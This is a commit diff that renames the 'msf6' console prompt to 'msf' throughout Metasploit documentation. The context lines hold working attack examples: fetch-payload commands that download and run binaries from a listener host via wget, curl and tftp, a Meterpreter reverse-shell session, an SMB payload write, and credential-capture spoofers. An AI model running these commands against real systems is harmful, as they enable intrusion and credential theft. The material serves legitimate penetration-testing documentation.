Skip to content

Commit 469f102

Browse files
committed
Updates docs to reflect new default prompt
1 parent f16de58 commit 469f102

File tree

832 files changed

+6710
-6712
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

832 files changed

+6710
-6712
lines changed

docs/_plugins/metasploit_console_language.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ def self.token(name, shortname, &b)
1717
SHORTNAME = 'z'
1818

1919
token :Msf, SHORTNAME do
20-
# prompt - msf / msf5 / msf6 / meterpreter
20+
# prompt - msf / meterpreter
2121
token :Prompt, "#{SHORTNAME}p"
2222
# [-]
2323
token :Error, "#{SHORTNAME}e"
@@ -49,7 +49,7 @@ def self.keywords
4949
state :root do
5050
mixin :whitespace
5151

52-
# Match msf, msf5, msf6, meterpreter
52+
# Match msf, meterpreter
5353
rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
5454
rule %r{^\[-\]}, Tokens::Msf::Error
5555
rule %r{^\[\+\]}, Tokens::Msf::Good
@@ -59,7 +59,7 @@ def self.keywords
5959
end
6060

6161
# State for highlighting the prompt such as
62-
# msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
62+
# msf auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
6363
state :msf_prompt do
6464
mixin :whitespace
6565

docs/metasploit-framework.wiki/Guidelines-for-Writing-Modules-with-SMB.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -290,7 +290,7 @@ end
290290
msfconsole output:
291291

292292
```msf
293-
msf6 exploit(windows/smb/msf_smb_client_test) > options
293+
msf exploit(windows/smb/msf_smb_client_test) > options
294294
295295
Module options (exploit/windows/smb/msf_smb_client_test):
296296
@@ -319,7 +319,7 @@ Exploit target:
319319
0 Windows
320320
321321
322-
msf6 exploit(windows/smb/msf_smb_client_test) > run
322+
msf exploit(windows/smb/msf_smb_client_test) > run
323323
324324
[*] Started reverse SSL handler on 172.16.60.1:4444
325325
[*] 172.16.60.128:445 - Create and write to Windows\Temp\payload.bat on \\172.16.60.128\C$ remote share
@@ -407,7 +407,7 @@ end
407407
msfconsole output:
408408

409409
```msf
410-
msf6 exploit(windows/smb/ruby_smb_client_test) > options
410+
msf exploit(windows/smb/ruby_smb_client_test) > options
411411
412412
Module options (exploit/windows/smb/ruby_smb_client_test):
413413
@@ -436,7 +436,7 @@ Exploit target:
436436
0 Windows
437437
438438
439-
msf6 exploit(windows/smb/ruby_smb_client_test) > run
439+
msf exploit(windows/smb/ruby_smb_client_test) > run
440440
441441
[*] Started reverse SSL handler on 172.16.60.1:4444
442442
[*] 172.16.60.128:445 - Create and write to Windows\Temp\payload.bat on \\172.16.60.128\C$ remote share

docs/metasploit-framework.wiki/How-To-Use-Plugins.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ They are designed to have a very loose definition in order to make them as usefu
44
Plugins are not available by default, they need to be loaded:
55

66
```msf
7-
msf6 > load plugin_name
7+
msf > load plugin_name
88
```
99

1010
Plugins can be automatically loaded and configured on msfconsole's start up by configuring a custom `~/.msf4/msfconsole.rc` file:
@@ -61,9 +61,9 @@ The current available plugins for Metasploit can be found by running the `load -
6161
The Alias plugin adds the ability to alias console commands:
6262

6363
```msf
64-
msf6 > load alias
64+
msf > load alias
6565
[*] Successfully loaded plugin: alias
66-
msf6 > alias -h
66+
msf > alias -h
6767
Usage: alias [options] [name [value]]
6868
6969
OPTIONS:
@@ -76,20 +76,20 @@ OPTIONS:
7676
Register an alias such as `proxy_enable`:
7777

7878
```msf
79-
msf6 > alias proxy_enable "set Proxies http:localhost:8079"
79+
msf > alias proxy_enable "set Proxies http:localhost:8079"
8080
```
8181

8282
Now when running the aliased `proxy_enable` command, the proxy datastore value will be set for the current module:
8383

8484
```msf
85-
msf6 auxiliary(scanner/http/title) > proxy_enable
85+
msf auxiliary(scanner/http/title) > proxy_enable
8686
Proxies => http:localhost:8079
8787
```
8888

8989
Viewing registered aliases:
9090

9191
```msf
92-
msf6 > alias
92+
msf > alias
9393
9494
Current Aliases
9595
===============
@@ -122,9 +122,9 @@ To use the plugin, it must first be loaded. That will provide the `captureg` com
122122
and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface.
123123

124124
```msf
125-
msf6 > load capture
125+
msf > load capture
126126
[*] Successfully loaded plugin: Credential Capture
127-
msf6 > captureg start --ip 192.168.159.128
127+
msf > captureg start --ip 192.168.159.128
128128
Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt
129129
Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808
130130
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
@@ -150,7 +150,7 @@ Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_2022032
150150
[+] LLMNR Spoofer started
151151
[+] mDNS Spoofer started
152152
[+] Started capture jobs
153-
msf6 >
153+
msf >
154154
```
155155

156156
This content was originally posted on the [Rapid7 Blog](https://www.rapid7.com/blog/post/2022/03/25/metasploit-weekly-wrap-up-154/).

docs/metasploit-framework.wiki/How-to-Configure-DNS.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult
1919
The current configuration can be printed by running `dns print`:
2020

2121
```msf
22-
msf6 > dns print
22+
msf > dns print
2323
Default search domain: N/A
2424
Default search list: lab.lan
2525
Current cache size: 0

docs/metasploit-framework.wiki/How-to-use-Metasploit-with-ngrok.md

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -76,27 +76,27 @@ $ dig +short 4.tcp.ngrok.io
7676

7777
metasploit side:
7878
```msf
79-
msf6 > use payload/windows/x64/meterpreter/reverse_http
80-
msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
79+
msf > use payload/windows/x64/meterpreter/reverse_http
80+
msf payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
8181
LHOST => 192.0.2.1
82-
msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
82+
msf payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
8383
LPORT => 17511
84-
msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
84+
msf payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
8585
ReverseListenerBindAddress => 127.0.0.1
86-
msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
86+
msf payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
8787
ReverseListenerBindPort => 4444
88-
msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler
88+
msf payload(windows/x64/meterpreter/reverse_http) > to_handler
8989
[*] Payload Handler Started as Job 2
90-
msf6 payload(windows/x64/meterpreter/reverse_http) >
90+
msf payload(windows/x64/meterpreter/reverse_http) >
9191
[*] Started HTTP reverse handler on http://127.0.0.1:4444
9292
93-
msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
93+
msf payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
9494
[*] Writing 7168 bytes to ngrok_payload.exe...
95-
msf6 payload(windows/x64/meterpreter/reverse_http) >
95+
msf payload(windows/x64/meterpreter/reverse_http) >
9696
[*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
9797
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400
9898
99-
msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
99+
msf payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
100100
[*] Starting interaction with 1...
101101
102102
meterpreter > getuid

docs/metasploit-framework.wiki/How-to-use-fetch-payloads.md

Lines changed: 26 additions & 26 deletions
Original file line numberDiff line numberDiff line change
@@ -43,8 +43,8 @@ The fastest way to understand Fetch Payloads is to use them and examine the outp
4343
target with the ability to connect back to us with an HTTP connection and a command execution vulnerability.
4444
First, let's look at the payload in isolation:
4545
```msf
46-
msf6 exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
47-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options
46+
msf exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
47+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options
4848
4949
Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):
5050
@@ -62,7 +62,7 @@ LPORT 4444 yes The listen port
6262
6363
View the full module info with the info, or info -d command.
6464
65-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
65+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
6666
```
6767

6868
### Options
@@ -106,19 +106,19 @@ payload, we would see different options.
106106

107107
### Generating the Fetch Payload
108108
```msf
109-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
109+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
110110
FETCH_COMMAND => WGET
111-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
111+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
112112
FETCH_SRVHOST => 10.5.135.201
113-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
113+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
114114
FETCH_SRVPORT => 8000
115-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
115+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
116116
LHOST => 10.5.135.201
117-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
117+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
118118
LPORT => 4567
119-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
119+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
120120
wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
121-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
121+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
122122
```
123123

124124
You can see the fetch payload generated:
@@ -130,7 +130,7 @@ When you start the `Fetch Handler`, it starts both the server hosting the binary
130130
served payload. With `verbose` set to `true`, you can see both the Fetch Handler and the Served Payload Handler are
131131
started:
132132
```msf
133-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
133+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
134134
[*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &
135135
[*] Payload Handler Started as Job 0
136136
[*] Fetch Handler listening on 10.5.135.201:8000
@@ -142,7 +142,7 @@ msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
142142
The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under
143143
`Jobs`, even though the Fetch Handler is listening:
144144
```msf
145-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l
145+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l
146146
147147
Jobs
148148
====
@@ -151,21 +151,21 @@ Jobs
151151
-- ---- ------- ------------
152152
0 Exploit: multi/handler cmd/linux/http/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4567
153153
154-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
154+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
155155
[*] exec: netstat -ant | grep 8000
156156
157157
tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN
158158
159159
```
160160
Killing the Served Payload handler will kill the Fetch Handler as well:
161161
```msf
162-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
162+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
163163
[*] Stopping the following job(s): 0
164164
[*] Stopping job 0
165-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
165+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
166166
[*] exec: netstat -ant | grep 8000
167167
168-
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
168+
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) >
169169
```
170170

171171
## Using Fetch Payloads on the Fly
@@ -183,7 +183,7 @@ The following example shows both the original command to download and execute th
183183
original fetch command directly to the shell. Since this requires two downloads, it is less stealthy, but the
184184
command to run on the target is significantly shorter.
185185
``` msf
186-
msf6 payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
186+
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
187187
[*] Command served: curl -so %TEMP%\DpRdBIfeyax.exe http://10.5.135.117:8080/zw3LGTh9FtaLJ4bCQRAWdw & start /B %TEMP%\DpRdBIfeyax.exe
188188
189189
[*] Command to run on remote host: curl -s http://10.5.135.117:8080/test|cmd
@@ -290,7 +290,7 @@ Then, you can set `FetchListenerBindPort` to 3069 and get the callback correctly
290290
4) Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time you
291291
start a tftp fetch handler, a new service will start:
292292
```msf
293-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
293+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
294294
295295
Jobs
296296
====
@@ -299,16 +299,16 @@ Jobs
299299
-- ---- ------- ------------
300300
2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444
301301
302-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
302+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
303303
LPORT => 4445
304-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
304+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
305305
306306
[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe
307307
[*] Payload Handler Started as Job 4
308308
309309
[*] starting tftpserver on 10.5.135.201:8080
310310
[*] Started reverse TCP handler on 10.5.135.201:4445
311-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
311+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
312312
313313
Jobs
314314
====
@@ -318,23 +318,23 @@ Jobs
318318
2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4444
319319
4 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445
320320
321-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
321+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
322322
[*] exec: netstat -an | grep 8080
323323
324324
udp 0 0 10.5.135.201:8080 0.0.0.0:*
325325
udp 0 0 10.5.135.201:8080 0.0.0.0:*
326-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
326+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
327327
FETCH_URIPATH => test4
328-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
328+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
329329
LPORT => 8547
330-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
330+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
331331
332332
[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe
333333
[*] Payload Handler Started as Job 5
334334
335335
[*] starting tftpserver on 10.5.135.201:8080
336336
[*] Started reverse TCP handler on 10.5.135.201:8547
337-
msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
337+
msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
338338
[*] exec: netstat -an | grep 8080
339339
340340
udp 0 0 10.5.135.201:8080 0.0.0.0:*

0 commit comments

Comments
 (0)